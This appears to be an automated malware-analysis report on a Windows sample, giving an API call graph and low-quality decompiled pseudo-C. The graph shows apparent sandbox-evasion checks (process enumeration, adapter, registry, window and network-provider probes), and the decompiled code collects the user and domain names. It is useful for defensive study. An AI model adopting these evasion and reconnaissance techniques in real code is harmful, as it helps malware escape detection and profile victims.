63988->63993 63990 21520586d60 
63989->63990 63991 21520586cb6 63989->63991 64157 215205d0900 12 API calls 2 library calls 63990->64157 63999 21520586ca7 memcpy_s 63991->63999 64154 21520587030 RaiseException Concurrency::cancel_current_task memcpy_s new 63991->64154 64156 215205d0924 12 API calls 2 library calls 63992->64156 64153 21520586f60 12 API calls 2 library calls 63993->64153 63999->63831 64158 215205d0220 GetProcessHeap HeapAlloc 64000->64158 64002 215205ccd10 64003 215205ccd14 64002->64003 64165 215205d0330 CreateToolhelp32Snapshot 64002->64165 64003->63834 64006 215205ccd3e 64006->63834 64009 215205ccd7b GetModuleHandleW 64011 215205ccd92 try_get_function 64009->64011 64010 215205ccd65 64010->63834 64183 215205cf230 64011->64183 64013 215205ccdb3 64078 215205ccfe7 64013->64078 64193 215205cd230 64013->64193 64021 215205ccdf7 64022 215205d0220 10 API calls 64021->64022 64021->64078 64023 215205cce13 64022->64023 64239 215205cd870 64023->64239 64026 215205cce51 64247 215205cd990 64026->64247 64028 215205cce62 64256 215205cda30 64028->64256 64032 215205cce83 64278 215205cdcc0 64032->64278 64036 215205cce9f 64305 215205ce070 64036->64305 64038 215205ccead 64309 215205ce5c0 64038->64309 64040 215205ccebb 64324 215205ce7d0 64040->64324 64042 215205ccec9 64340 215205ce1c0 64042->64340 64044 215205cced7 64355 215205ce3a0 64044->64355 64046 215205ccee5 64370 215205cea60 64046->64370 64048 215205ccef3 64048->64078 64387 215205cfec0 64048->64387 64058 215205ccf46 64423 215205cf080 64058->64423 64060 215205ccf54 64060->64078 64426 215205cf2f0 64060->64426 64066 215205ccf85 64066->64078 64465 215205cfe10 64066->64465 64069 215205d0220 10 API calls 64070 215205ccfab 64069->64070 64070->64078 64472 215205cfa60 64070->64472 64078->63834 64079->63838 64080->63840 64081->63842 64082->63851 64083->63845 64084->63847 64085->63849 64086->63867 64087->63854 64088->63856 64089->63858 64090->63860 64091->63862 64092->63864 64093->63869 64094->63871 64095->63873 64096->63878 64097->63884 64098->63874 
64099->63877 64100->63885 64101->63889 64102->63880 64103->63981 64104->63981 64105->63981 64106->63897 64107->63981 64108->63981 64109->63901 64110->63905 64111->63981 64112->63908 64113->63981 64114->63981 64115->63914 64116->63981 64117->63981 64118->63981 64119->63981 64120->63981 64121->63981 64122->63981 64123->63981 64124->63981 64125->63981 64126->63903 64127->63893 64128->63919 64129->63923 64130->63933 64131->63939 64132->63943 64133->63948 64134->63965 64135->63970 64136->63978 64137->63932 64138->63935 64139->63940 64140->63944 64141->63954 64142->63951 64143->63955 64144->63957 64145->63959 64146->63961 64147->63963 64148->63972 64149->63971 64150->63978 64151->63983 64152->63888 64153->63999 64154->63999 64155->63992 64156->63990 64159 215205d026d GetAdaptersInfo 64158->64159 64160 215205d025b 64158->64160 64161 215205d0280 GetProcessHeap HeapFree GetProcessHeap HeapAlloc 64159->64161 64164 215205d02c2 GetProcessHeap HeapFree 64159->64164 64160->64002 64161->64160 64162 215205d02b4 GetAdaptersInfo 64161->64162 64162->64164 64164->64002 64166 215205d0374 Process32FirstW 64165->64166 64169 215205d03ed 64165->64169 64167 215205d03e4 CloseHandle 64166->64167 64168 215205d038e StrCmpIW 64166->64168 64167->64169 64170 215205d03a3 CloseHandle 64168->64170 64171 215205d03af Process32NextW 64168->64171 64172 215205f59d0 _handle_error 4 API calls 64169->64172 64170->64169 64171->64167 64173 215205d03be 64171->64173 64174 215205ccd31 64172->64174 64175 215205d03c0 StrCmpIW 64173->64175 64174->64006 64177 215205cd010 64174->64177 64175->64170 64176 215205d03d5 Process32NextW 64175->64176 64176->64167 64176->64175 64178 215205cd190 64177->64178 64179 215205d0330 12 API calls 64178->64179 64180 215205cd1a7 64178->64180 64179->64178 64181 215205f59d0 _handle_error 4 API calls 64180->64181 64182 215205ccd59 64181->64182 64182->64009 64182->64010 64184 215205cf25b __ExceptionPtr::__ExceptionPtr 64183->64184 64503 215205cd1d0 64184->64503 64187 215205cf2d4 64190 
215205f59d0 _handle_error 4 API calls 64187->64190 64188 215205cf2ac RegCloseKey 64189 215205f59d0 _handle_error 4 API calls 64188->64189 64191 215205cf2cc 64189->64191 64192 215205cf2e6 64190->64192 64191->64013 64192->64013 64194 215205cd2f0 __ExceptionPtr::__ExceptionPtr 64193->64194 64195 215205cd1d0 35 API calls 64194->64195 64197 215205cd34a 64194->64197 64522 215205d0130 64194->64522 64195->64194 64198 215205f59d0 _handle_error 4 API calls 64197->64198 64199 215205ccdcd 64198->64199 64200 215205cd380 64199->64200 64201 215205cd420 __ExceptionPtr::__ExceptionPtr 64200->64201 64202 215205cd1d0 35 API calls 64201->64202 64205 215205cd48b 64201->64205 64203 215205cd456 RegOpenKeyExW 64202->64203 64203->64201 64204 215205cd48f RegCloseKey 64203->64204 64204->64205 64206 215205f59d0 _handle_error 4 API calls 64205->64206 64207 215205ccddb 64206->64207 64208 215205cd4d0 64207->64208 64209 215205cd5d9 __ExceptionPtr::__ExceptionPtr 64208->64209 64210 215205cd5ea GetWindowsDirectoryW 64209->64210 64534 215205d00a0 64210->64534 64212 215205cd608 64213 215205cd60c Wow64DisableWow64FsRedirection 64212->64213 64215 215205cd617 __ExceptionPtr::__ExceptionPtr 64212->64215 64213->64215 64214 215205cd620 PathCombineW 64214->64215 64215->64214 64216 215205cd1d0 35 API calls 64215->64216 64222 215205cd682 64215->64222 64217 215205cd666 GetFileAttributesW 64216->64217 64217->64215 64218 215205cd6b0 64219 215205f59d0 _handle_error 4 API calls 64218->64219 64220 215205ccde9 64219->64220 64225 215205cd740 64220->64225 64221 215205cd6ef GetCurrentProcess 64223 215205cd6ff 64221->64223 64222->64218 64222->64221 64223->64218 64224 215205cd706 Wow64RevertWow64FsRedirection 64223->64224 64224->64218 64226 215205cd76e __ExceptionPtr::__ExceptionPtr 64225->64226 64227 215205d00a0 GetCurrentProcess 64226->64227 64228 215205cd7cb 64227->64228 64229 215205cd7ec SHGetSpecialFolderPathW 64228->64229 64230 215205cd7d7 ExpandEnvironmentStringsW 64228->64230 64231 215205cd7fb PathCombineW 
GetFileAttributesW 64229->64231 64230->64231 64232 215205cd84a 64231->64232 64233 215205cd829 64231->64233 64234 215205f59d0 _handle_error 4 API calls 64232->64234 64233->64232 64235 215205cd82d 64233->64235 64236 215205cd85c 64234->64236 64237 215205f59d0 _handle_error 4 API calls 64235->64237 64236->64021 64238 215205cd842 64237->64238 64238->64021 64240 215205cd8e0 CreateFileW 64239->64240 64242 215205cd924 __ExceptionPtr::__ExceptionPtr 64240->64242 64241 215205cd1d0 35 API calls 64241->64242 64242->64240 64242->64241 64243 215205cd950 CloseHandle 64242->64243 64244 215205cd94c 64242->64244 64243->64244 64245 215205f59d0 _handle_error 4 API calls 64244->64245 64246 215205cce22 FindWindowW FindWindowW 64245->64246 64246->64026 64248 215205f8ef0 __ExceptionPtr::__ExceptionPtr 64247->64248 64249 215205cd9bb WNetGetProviderNameW 64248->64249 64250 215205cda0f 64249->64250 64251 215205cd9dc StrCmpIW 64249->64251 64253 215205f59d0 _handle_error 4 API calls 64250->64253 64252 215205f59d0 _handle_error 4 API calls 64251->64252 64254 215205cda07 64252->64254 64255 215205cda21 64253->64255 64254->64028 64255->64028 64258 215205cda70 __ExceptionPtr::__ExceptionPtr 64256->64258 64257 215205cd1d0 35 API calls 64257->64258 64258->64257 64259 215205d0330 12 API calls 64258->64259 64260 215205cdab5 64258->64260 64259->64258 64261 215205f59d0 _handle_error 4 API calls 64260->64261 64262 215205cce75 64261->64262 64263 215205cdae0 64262->64263 64539 215205d0410 CoInitializeEx 64263->64539 64265 215205cdb0b 64266 215205cdb13 SysAllocString SysAllocString 64265->64266 64267 215205cdcb5 64265->64267 64268 215205cdbaa 64266->64268 64273 215205cdb55 64266->64273 64267->64032 64269 215205cdbb4 SysFreeString 64268->64269 64276 215205cdbbd wcsstr 64268->64276 64269->64276 64270 215205cdba1 SysFreeString 64270->64268 64271 215205cdca5 64271->64032 64272 215205cdc7f CoUninitialize 64272->64271 64273->64270 64274 215205cdb9b CoUninitialize 64273->64274 64274->64270 64276->64271 64276->64272 
                C-Code - Quality: 30%
                			E0000021521520589E00(void* __edx, void* __ebp, void* __esp, void* __rax, long long __rbx, void* __r8, signed int __r9, void* __r11) {
                				void* __rdi;
                				void* __rsi;
                				void* __rbp;
                				void* __r12;
                				void* __r13;
                				void* __r14;
                				void* __r15;
                				void* _t712;
                				void* _t762;
                				void* _t767;
                				void* _t769;
                				void* _t778;
                				void* _t798;
                				signed int _t818;
                				void* _t821;
                				void* _t823;
                				void* _t824;
                				void* _t825;
                				void* _t826;
                				void* _t845;
                				void* _t851;
                				void* _t865;
                				void* _t866;
                				void* _t868;
                				void* _t869;
                				void* _t870;
                				void* _t875;
                				void* _t878;
                				void* _t882;
                				void* _t883;
                				void* _t884;
                				void* _t887;
                				void* _t888;
                				void* _t890;
                				void* _t892;
                				void* _t906;
                				void* _t908;
                				void* _t915;
                				void* _t916;
                				void* _t917;
                				void* _t919;
                				void* _t920;
                				void* _t921;
                				int _t924;
                				void* _t925;
                				void* _t926;
                				long _t932;
                				void* _t943;
                				void* _t948;
                				void* _t950;
                				void* _t953;
                				void* _t954;
                				void* _t955;
                				void* _t956;
                				void* _t957;
                				void* _t958;
                				void* _t959;
                				void* _t960;
                				void* _t961;
                				void* _t963;
                				void* _t965;
                				signed int _t968;
                				signed int _t969;
                				signed int _t982;
                				signed char _t988;
                				signed char _t991;
                				signed char _t996;
                				signed char _t1003;
                				signed char _t1005;
                				void* _t1042;
                				void* _t1257;
                				signed int _t1258;
                				signed long long _t1259;
                				intOrPtr _t1261;
                				signed long long _t1262;
                				intOrPtr _t1264;
                				long long _t1265;
                				long long _t1267;
                				intOrPtr _t1276;
                				intOrPtr _t1278;
                				signed long long _t1279;
                				signed long long* _t1281;
                				intOrPtr _t1282;
                				intOrPtr _t1284;
                				signed long long _t1285;
                				intOrPtr _t1287;
                				signed long long _t1289;
                				signed long long _t1292;
                				signed long long _t1294;
                				signed long long _t1297;
                				signed int* _t1301;
                				signed long long _t1303;
                				signed long long _t1306;
                				signed long long _t1308;
                				signed long long _t1310;
                				signed long long _t1313;
                				signed long long _t1315;
                				signed long long _t1317;
                				signed long long _t1320;
                				signed long long _t1322;
                				signed long long _t1325;
                				signed long long _t1327;
                				intOrPtr _t1333;
                				intOrPtr _t1335;
                				signed long long _t1336;
                				long long _t1338;
                				intOrPtr _t1340;
                				intOrPtr _t1342;
                				signed long long _t1343;
                				intOrPtr _t1345;
                				signed int _t1346;
                				intOrPtr _t1347;
                				intOrPtr _t1349;
                				intOrPtr _t1350;
                				intOrPtr _t1352;
                				intOrPtr _t1355;
                				intOrPtr _t1357;
                				long long _t1358;
                				intOrPtr _t1360;
                				signed long long _t1362;
                				intOrPtr _t1364;
                				signed long long _t1368;
                				signed long long _t1370;
                				signed long long _t1372;
                				signed long long _t1374;
                				signed long long _t1376;
                				void* _t1378;
                				intOrPtr _t1382;
                				intOrPtr _t1383;
                				intOrPtr _t1387;
                				intOrPtr _t1407;
                				void* _t1408;
                				intOrPtr _t1410;
                				void* _t1411;
                				intOrPtr _t1428;
                				void* _t1429;
                				intOrPtr _t1458;
                				void* _t1459;
                				intOrPtr _t1461;
                				void* _t1462;
                				intOrPtr _t1471;
                				void* _t1472;
                				intOrPtr _t1474;
                				void* _t1475;
                				intOrPtr _t1522;
                				void* _t1523;
                				intOrPtr _t1525;
                				void* _t1526;
                				intOrPtr _t1583;
                				void* _t1584;
                				intOrPtr _t1586;
                				void* _t1587;
                				intOrPtr _t1619;
                				void* _t1620;
                				intOrPtr _t1622;
                				void* _t1623;
                				intOrPtr _t1632;
                				void* _t1633;
                				intOrPtr _t1638;
                				void* _t1639;
                				intOrPtr _t1644;
                				void* _t1645;
                				intOrPtr _t1710;
                				void* _t1808;
                				signed long long _t1812;
                				intOrPtr _t1816;
                				intOrPtr _t1817;
                				void* _t1818;
                				long long _t1820;
                				intOrPtr _t1822;
                				void* _t1823;
                				long long* _t1824;
                				void* _t1825;
                				void* _t1826;
                				void* _t1900;
                				void* _t1912;
                				void* _t1913;
                				signed long long _t1917;
                				signed long long _t1918;
                				signed long long _t1920;
                				void* _t1921;
                				long long _t1922;
                				long long _t1923;
                				long long _t1924;
                				long long _t1925;
                
                				_t1913 = __r11;
                				_t1365 = __rbx;
                				_t1257 = __rax;
                				_t1824 = _t1825 - 0x980;
                				_t1826 = _t1825 - 0xa80;
                				 *((long long*)(_t1824 + 0x538)) = 0xfffffffe;
                				 *((long long*)(_t1826 + 0xac0)) = __rbx;
                				r14d = 0;
                				 *(_t1824 + 0x160) = _t1918;
                				 *(_t1824 + 0x168) = _t1918;
                				 *(_t1824 + 0x168) = 0xf;
                				 *(_t1824 + 0x160) = _t1918;
                				 *(_t1824 + 0x150) = r14b;
                				_t1387 =  *0x20683378; // 0x20c
                				if (_t1387 == 0) goto 0x20589e6d;
                				WaitForSingleObject(??, ??);
                				if ( *0x20683368 == 0) goto 0x20589e91;
                				_t1891 = __r9 | 0xffffffff;
                				r8d = 0;
                				E0000021521520586C40(__rbx, _t1824 + 0x150, 0x20683358, _t1808, _t1818, __r8, __r9 | 0xffffffff); // executed
                				_t712 = E00000215215205CCD00(); // executed
                				if (_t712 != 0) goto 0x2058c0ab;
                				E00000215215205FAE64(_t712, _t1257, _t1824 + 0x150, 0x20683358);
                				E00000215215205FAB80(0, _t1257);
                				_t1258 = _t1824 + 0x9d8;
                				 *(_t1826 + 0x28) = _t1258;
                				 *(_t1826 + 0x20) = r14d;
                				r9d = 0;
                				E00000215215205FACE4(0, 0, _t1258, _t1365, _t1257, _t1818, 0x21520589d90, __r9 | 0xffffffff);
                				 *0x206832b8 = _t1258;
                				 *(_t1826 + 0x60) = _t1918;
                				 *(_t1826 + 0x68) = _t1918;
                				 *(_t1826 + 0x68) = 0xf;
                				 *(_t1826 + 0x60) = _t1918;
                				 *((char*)(_t1826 + 0x50)) = 0;
                				if ("iKInPE9WrB" != 0) goto 0x20589f0a;
                				goto 0x20589f1a;
                				if ( *((char*)("iKInPE9WrB" + (_t1918 | 0xffffffff) + 1)) != 0) goto 0x20589f10;
                				E0000021521520586B10(_t1365, _t1826 + 0x50, "iKInPE9WrB", _t1818, (_t1918 | 0xffffffff) + 1);
                				if ( *(_t1826 + 0x60) == 0) goto 0x2058a05e;
                				_t1668 =  >=  ?  *((void*)(_t1826 + 0x50)) : _t1826 + 0x50;
                				r8d =  *(_t1826 + 0x60);
                				E0000021521520581080(_t1824 + 0x650,  >=  ?  *((void*)(_t1826 + 0x50)) : _t1826 + 0x50);
                				r8d = 0x4f;
                				E0000021521520581420( *(_t1826 + 0x68) - 0x10, _t1824 + 0x650, "127.0.0.1");
                				_t1671 =  >=  ?  *((void*)(_t1826 + 0x50)) : _t1826 + 0x50;
                				r8d =  *(_t1826 + 0x60);
                				E0000021521520581080(_t1824 + 0x870,  >=  ?  *((void*)(_t1826 + 0x50)) : _t1826 + 0x50);
                				r8d = 0x4f;
                				E0000021521520581420( *(_t1826 + 0x68) - 0x10, _t1824 + 0x870, 0x2067e190);
                				_t1674 =  >=  ?  *((void*)(_t1826 + 0x50)) : _t1826 + 0x50;
                				r8d =  *(_t1826 + 0x60);
                				E0000021521520581080(_t1824 + 0x760,  >=  ?  *((void*)(_t1826 + 0x50)) : _t1826 + 0x50);
                				r8d = 0x4f;
                				E0000021521520581420( *(_t1826 + 0x68) - 0x10, _t1824 + 0x760, 0x2067e1e0);
                				_t1677 =  >=  ?  *((void*)(_t1826 + 0x50)) : _t1826 + 0x50;
                				r8d =  *(_t1826 + 0x60);
                				E0000021521520581080(_t1824 + 0x390,  >=  ?  *((void*)(_t1826 + 0x50)) : _t1826 + 0x50);
                				r8d = 0xfff;
                				E0000021521520581290(E0000021521520581290(E0000021521520581290(E0000021521520581290(E0000021521520581420( *(_t1826 + 0x68) - 0x10, _t1824 + 0x390, 0x2067d140), _t1824 + 0x390), _t1824 + 0x760), _t1824 + 0x870), _t1824 + 0x650);
                				 *(_t1824 + 0x1a0) = _t1918;
                				 *(_t1824 + 0x1a8) = _t1918;
                				 *(_t1824 + 0x1a8) = 0xf;
                				 *(_t1824 + 0x1a0) = _t1918;
                				 *((char*)(_t1824 + 0x190)) = 0;
                				if ( *0x2067e1e0 != 0) goto 0x2058a093;
                				goto 0x2058a0aa;
                				asm("o16 nop [eax+eax]");
                				if ( *((char*)(0x2067e1e0 + (_t1918 | 0xffffffff) + 1)) != 0) goto 0x2058a0a0;
                				E0000021521520586B10(0x2067e1e0, _t1824 + 0x190, 0x2067e1e0, 0x2067d140, (_t1918 | 0xffffffff) + 1);
                				 *(_t1824 - 0x80) = _t1918;
                				 *(_t1824 - 0x78) = _t1918;
                				 *(_t1824 - 0x78) = 0xf;
                				 *(_t1824 - 0x80) = _t1918;
                				 *((char*)(_t1826 + 0x70)) = 0;
                				if ( *0x2067e190 != 0) goto 0x2058a0e1;
                				goto 0x2058a0ef;
                				if ( *((char*)(0x2067e190 + (_t1918 | 0xffffffff) + 1)) != 0) goto 0x2058a0e5;
                				E0000021521520586B10(0x2067e1e0, _t1826 + 0x70, 0x2067e190, 0x2067d140, (_t1918 | 0xffffffff) + 1);
                				 *(_t1824 - 0x40) = _t1918;
                				 *(_t1824 - 0x38) = _t1918;
                				 *(_t1824 - 0x38) = 0xf;
                				 *(_t1824 - 0x40) = _t1918;
                				 *((char*)(_t1824 - 0x50)) = 0;
                				if ( *0x2067d140 != 0) goto 0x2058a123;
                				goto 0x2058a13a;
                				asm("o16 nop [eax+eax]");
                				if ( *((char*)(0x2067d140 + (_t1918 | 0xffffffff) + 1)) != 0) goto 0x2058a130;
                				E0000021521520586B10(0x2067e1e0, _t1824 - 0x50, 0x2067d140, 0x2067d140, (_t1918 | 0xffffffff) + 1);
                				E00000215215205871E0(0, 0, 0x2067e1e0, _t1824 + 0xd0, 0x2067e190, 0x2067d140, _t1826 + 0x70, _t1891);
                				r15d = 0x1000;
                				_t1259 =  *(_t1824 - 0x38);
                				if (_t1259 - 0x10 < 0) goto 0x2058a1b6;
                				_t1407 =  *((intOrPtr*)(_t1824 - 0x50));
                				if (_t1259 + 1 - _t1921 < 0) goto 0x2058a1b1;
                				if (0 == 0) goto 0x2058a184;
                				0x205faadc();
                				asm("int3");
                				_t1261 =  *((intOrPtr*)(_t1407 - 8));
                				if (_t1261 - _t1407 < 0) goto 0x2058a193;
                				0x205faadc();
                				asm("int3");
                				_t1408 = _t1407 - _t1261;
                				if (_t1408 - 8 >= 0) goto 0x2058a1a2;
                				0x205faadc();
                				asm("int3");
                				if (_t1408 - 0x27 <= 0) goto 0x2058a1ae;
                				0x205faadc();
                				asm("int3");
                				0x205f51e4();
                				 *(_t1824 - 0x38) = 0xf;
                				 *(_t1824 - 0x40) = _t1918;
                				 *((char*)(_t1824 - 0x50)) = 0;
                				_t1262 =  *(_t1824 - 0x78);
                				if (_t1262 - 0x10 < 0) goto 0x2058a21a;
                				_t1410 =  *((intOrPtr*)(_t1826 + 0x70));
                				if (_t1262 + 1 - _t1921 < 0) goto 0x2058a215;
                				if (0 == 0) goto 0x2058a1e8;
                				0x205faadc();
                				asm("int3");
                				_t1264 =  *((intOrPtr*)(_t1410 - 8));
                				if (_t1264 - _t1410 < 0) goto 0x2058a1f7;
                				0x205faadc();
                				asm("int3");
                				_t1411 = _t1410 - _t1264;
                				if (_t1411 - 8 >= 0) goto 0x2058a206;
                				0x205faadc();
                				asm("int3");
                				if (_t1411 - 0x27 <= 0) goto 0x2058a212;
                				0x205faadc();
                				asm("int3");
                				0x205f51e4();
                				 *(_t1824 - 0x78) = 0xf;
                				 *(_t1824 - 0x80) = _t1918;
                				 *((char*)(_t1826 + 0x70)) = 0;
                				if ( *(_t1826 + 0x60) == 0) goto 0x2058a34c;
                				_t1684 =  >=  ?  *((void*)(_t1826 + 0x50)) : _t1826 + 0x50;
                				r8d =  *(_t1826 + 0x60);
                				E0000021521520581080(_t1824 + 0x390,  >=  ?  *((void*)(_t1826 + 0x50)) : _t1826 + 0x50);
                				r8d = 0x50;
                				E00000215215205812A0(_t1824 + 0x390, "127.0.0.1", _t1891);
                				_t1687 =  >=  ?  *((void*)(_t1826 + 0x50)) : _t1826 + 0x50;
                				r8d =  *(_t1826 + 0x60);
                				E0000021521520581080(_t1824 + 0x760,  >=  ?  *((void*)(_t1826 + 0x50)) : _t1826 + 0x50);
                				r8d = 0x50;
                				E00000215215205812A0(_t1824 + 0x760, 0x2067e190, _t1891);
                				_t1690 =  >=  ?  *((void*)(_t1826 + 0x50)) : _t1826 + 0x50;
                				r8d =  *(_t1826 + 0x60);
                				E0000021521520581080(_t1824 + 0x870,  >=  ?  *((void*)(_t1826 + 0x50)) : _t1826 + 0x50);
                				r8d = 0x50;
                				E00000215215205812A0(_t1824 + 0x870, 0x2067e1e0, _t1891);
                				_t1693 =  >=  ?  *((void*)(_t1826 + 0x50)) : _t1826 + 0x50;
                				r8d =  *(_t1826 + 0x60);
                				E0000021521520581080(_t1824 + 0x650,  >=  ?  *((void*)(_t1826 + 0x50)) : _t1826 + 0x50);
                				r8d = r15d;
                				E0000021521520581290(E0000021521520581290(E0000021521520581290(E0000021521520581290(E00000215215205812A0(_t1824 + 0x650, 0x2067d140, _t1891), _t1824 + 0x650), _t1824 + 0x870), _t1824 + 0x760), _t1824 + 0x390);
                				 *(_t1824 + 0x1c0) = _t1918;
                				 *(_t1824 + 0x1c8) = _t1918;
                				 *(_t1824 + 0x1c8) = 0xf;
                				 *(_t1824 + 0x1c0) = _t1918;
                				 *((char*)(_t1824 + 0x1b0)) = 0;
                				__imp__CoInitializeEx();
                				 *(_t1826 + 0x40) = _t1918;
                				 *(_t1826 + 0x38) = r14d;
                				 *(_t1826 + 0x30) = _t1918;
                				r13d = 3;
                				 *(_t1826 + 0x28) = r13d;
                				 *(_t1826 + 0x20) = r14d;
                				r9d = 0;
                				r8d = 0;
                				__imp__CoInitializeSecurity();
                				E00000215215205CA49C(_t1264, 0x2067e1e0);
                				_t129 = _t1824 + 0x370; // 0x373
                				E00000215215205CBE80(0, 0x2067e1e0, _t129, 0x2067e190, _t1826 + 0x70);
                				_t130 = _t1824 - 0x18; // -21
                				E00000215215205CBB80(0, 0x2067e1e0, _t130, 0x2067e190, _t1826 + 0x70);
                				_t131 = _t1824 + 0x370; // 0x373
                				_t132 = _t1824 + 0x2d8; // 0x2db
                				E00000215215205895D0(_t132, _t1264, 0x2067e190, 0x2067d140, _t1824, _t131, _t1891);
                				_t1265 =  *_t1824;
                				if (_t1265 - 0x10 < 0) goto 0x2058a433;
                				_t1428 =  *((intOrPtr*)(_t1824 - 0x18));
                				if (_t1265 + 1 - _t1921 < 0) goto 0x2058a42e;
                				if (0 == 0) goto 0x2058a401;
                				0x205faadc();
                				asm("int3");
                				_t1267 =  *((intOrPtr*)(_t1428 - 8));
                				if (_t1267 - _t1428 < 0) goto 0x2058a410;
                				0x205faadc();
                				asm("int3");
                				_t1429 = _t1428 - _t1267;
                				if (_t1429 - 8 >= 0) goto 0x2058a41f;
                				0x205faadc();
                				asm("int3");
                				if (_t1429 - 0x27 <= 0) goto 0x2058a42b;
                				0x205faadc();
                				asm("int3");
                				0x205f51e4();
                				 *_t1824 = 0xf;
                				 *(_t1824 - 8) = _t1918;
                				 *((char*)(_t1824 - 0x18)) = 0;
                				 *((long long*)(_t1824 + 0x558)) = _t1267;
                				 *((long long*)(_t1824 + 0x560)) = _t1267;
                				 *((long long*)(_t1824 + 0x568)) = _t1267;
                				 *((long long*)(_t1824 + 0x570)) = _t1267;
                				 *((long long*)(_t1824 + 0x578)) = _t1267;
                				 *((long long*)(_t1824 + 0x580)) = _t1267;
                				 *((long long*)(_t1824 + 0x588)) = _t1267;
                				 *((long long*)(_t1824 + 0x590)) = _t1267;
                				_t147 = _t1824 + 0x540; // 0x543
                				E00000215215205815E0(_t147);
                				_t148 = _t1824 + 0x540; // 0x543
                				E00000215215205815E0(_t148);
                				_t149 = _t1824 + 0x2d8; // 0x2db
                				_t1697 =  >=  ?  *((void*)(_t1824 + 0x2d8)) : _t149;
                				r8d =  *(_t1824 + 0x2e8);
                				_t153 = _t1824 + 0x540; // 0x543
                				E0000021521520581630(_t153,  >=  ?  *((void*)(_t1824 + 0x2d8)) : _t149, _t131);
                				_t154 = _t1824 + 0x540; // 0x543
                				E0000021521520583620(0xffffffff, _t154);
                				_t155 = _t1824 + 0x598; // 0x59b
                				_t156 = _t1824 + 0x1d0; // 0x1d3
                				E0000021521520581460(_t156, _t155, _t1913);
                				_t157 = _t1824 + 0x1d0; // 0x1d3
                				if (E00000215215205C7480(_t1267, 0x2067e1e0, _t157) != 0) goto 0x2058a509;
                				__imp__CoUninitialize();
                				TerminateThread(??, ??);
                				goto 0x2058c021;
                				r8d = 0;
                				_t159 = _t1824 + 0x298; // 0x29b
                				_t160 = _t1824 + 0x1d0; // 0x1d3
                				E000002152152058C4C0(_t1267, _t160, _t159);
                				_t162 = _t1824 + 0x4f8; // 0x4fb
                				_t163 = _t1824 + 0x1d0; // 0x1d3
                				E000002152152058C4C0(_t1267, _t163, _t162);
                				_t164 = _t1824 + 0x220; // 0x223
                				E00000215215205CC000(0, 0x2067e1e0, _t164, 0x2067e190,  *(_t1824 + 0x1e0) >> 1);
                				if ( *((long long*)(_t1824 + 0x380)) == 0) goto 0x2058a5bc;
                				r8d = 1;
                				_t166 = _t1824 + 0x220; // 0x223
                				E0000021521520588C10(0x2067e1e0, _t166, "\n", 0x2067e190, _t1824,  *(_t1824 + 0x1e0) >> 1);
                				_t167 = _t1824 + 0x370; // 0x373
                				_t168 = _t1824 + 0x2b8; // 0x2bb
                				E00000215215205893D0(0x2067e1e0, _t168, "User name: ", 0x2067d140, _t1824, _t167,  *(_t1824 + 0x1e0) >> 0x00000001 | 0xffffffff);
                				r8d = r8d ^ r8d;
                				_t169 = _t1824 + 0x220; // 0x223
                				_t762 = E0000021521520588D60(0x2067e1e0, _t169, _t1267, 0x2067e190, 0x2067d140, _t1824, _t167,  *(_t1824 + 0x1e0) >> 0x00000001 | 0xffffffffffffffff);
                				_t170 = _t1824 + 0x2b8; // 0x2bb
                				E0000021521520586820(_t762, 0, _t170);
                				_t171 = _t1824 + 0x4d8; // 0x4db
                				E00000215215205CBD00(0, 0x2067e1e0, _t171, 0x2067e190, _t167);
                				if ( *((long long*)(_t1824 + 0x4e8)) == 0) goto 0x2058a627;
                				_t173 = _t1824 + 0x220; // 0x223
                				E0000021521520588C10(0x2067e1e0, _t173, "\n", 0x2067e190, _t1824, 0x2067d140);
                				_t174 = _t1824 + 0x4d8; // 0x4db
                				_t175 = _t1824 + 0x2b8; // 0x2bb
                				E00000215215205893D0(0x2067e1e0, _t175, "Domain name: ", 0x2067d140, _t1824, _t174,  *(_t1824 + 0x1e0) >> 0x00000001 | 0xffffffffffffffff);
                				r8d = r8d ^ r8d;
                				_t176 = _t1824 + 0x220; // 0x223
                				_t767 = E0000021521520588D60(0x2067e1e0, _t176, _t1267, 0x2067e190, 0x2067d140, _t1824, _t174,  *(_t1824 + 0x1e0) >> 0x00000001 | 0xffffffffffffffff);
                				_t177 = _t1824 + 0x2b8; // 0x2bb
                				E0000021521520586820(_t767, 0, _t177);
                				 *(_t1824 + 0x250) = _t1918;
                				 *(_t1824 + 0x258) = _t1918;
                				 *(_t1824 + 0x258) = 0xf;
                				 *(_t1824 + 0x250) = _t1918;
                				 *((char*)(_t1824 + 0x240)) = 0;
                				r8d = 0;
                				_t183 = _t1824 + 0x150; // 0x153
                				_t184 = _t1824 + 0x240; // 0x243
                				_t769 = E0000021521520586C40(0x2067e1e0, _t184, _t183, 0x2067e190, 0x2067d140, _t174,  *(_t1824 + 0x1e0) >> 0x00000001 | 0xffffffffffffffff);
                				_t185 = _t1824 + 0x298; // 0x29b
                				_t1709 =  >=  ?  *((void*)(_t1824 + 0x298)) : _t185;
                				r8d = 0;
                				_t189 = _t1824 + 0x240; // 0x243
                				E0000021521520586A20(_t769, _t189,  >=  ?  *((void*)(_t1824 + 0x298)) : _t185, _t174,  *((intOrPtr*)(_t1824 + 0x2a8)));
                				 *(_t1824 + 0x9c8) = _t1267 != 0xffffffff;
                				asm("xorps xmm0, xmm0");
                				asm("movdqu [ebp-0x30], xmm0");
                				 *(_t1824 - 0x20) = _t1918;
                				asm("o16 nop [eax+eax]");
                				_t968 = r14d;
                				_t1710 =  *((intOrPtr*)(_t1824 + 0xd0));
                				if ( *((intOrPtr*)(_t1824 + 0xd8)) - _t1710 >> 6 == 0) goto 0x2058b901;
                				_t194 = (_t1918 << 6) + _t1710 + 0x20; // 0x20
                				if (E000002152152059A380(_t968, 0, 0, _t1042,  *((intOrPtr*)(_t1824 + 0xd8)) - _t1710 >> 6, 0x2067e1e0, (_t1918 << 6) + _t1710, _t194, 0x2067d140, _t1824, _t174,  *((intOrPtr*)(_t1824 + 0x2a8)), _t1912) != 0) goto 0x2058a728;
                				_t969 = _t968 + 1;
                				if (_t969 -  *((intOrPtr*)(_t1824 + 0xd8)) -  *((intOrPtr*)(_t1824 + 0xd0)) >> 6 < 0) goto 0x2058a6f0;
                				goto 0x2058b901;
                				 *0x206830a8 = _t969;
                				r12d = r14d;
                				 *(_t1824 + 0x9d0) = r14d;
                				_t198 = _t1824 - 0x30; // -45
                				 *(_t1826 + 0x20) = _t198;
                				_t200 = _t1824 + 0x220; // 0x223
                				_t201 = _t1824 + 0x190; // 0x193
                				_t202 = _t1824 + 0x1d0; // 0x1d3
                				E00000215215205C3D60(_t198, 0x2067e1e0, _t1826 + 0x70, _t202, _t201, _t200);
                				 *(_t1826 + 0x20) = _t1826 + 0x50;
                				_t1900 = _t1826 + 0x70;
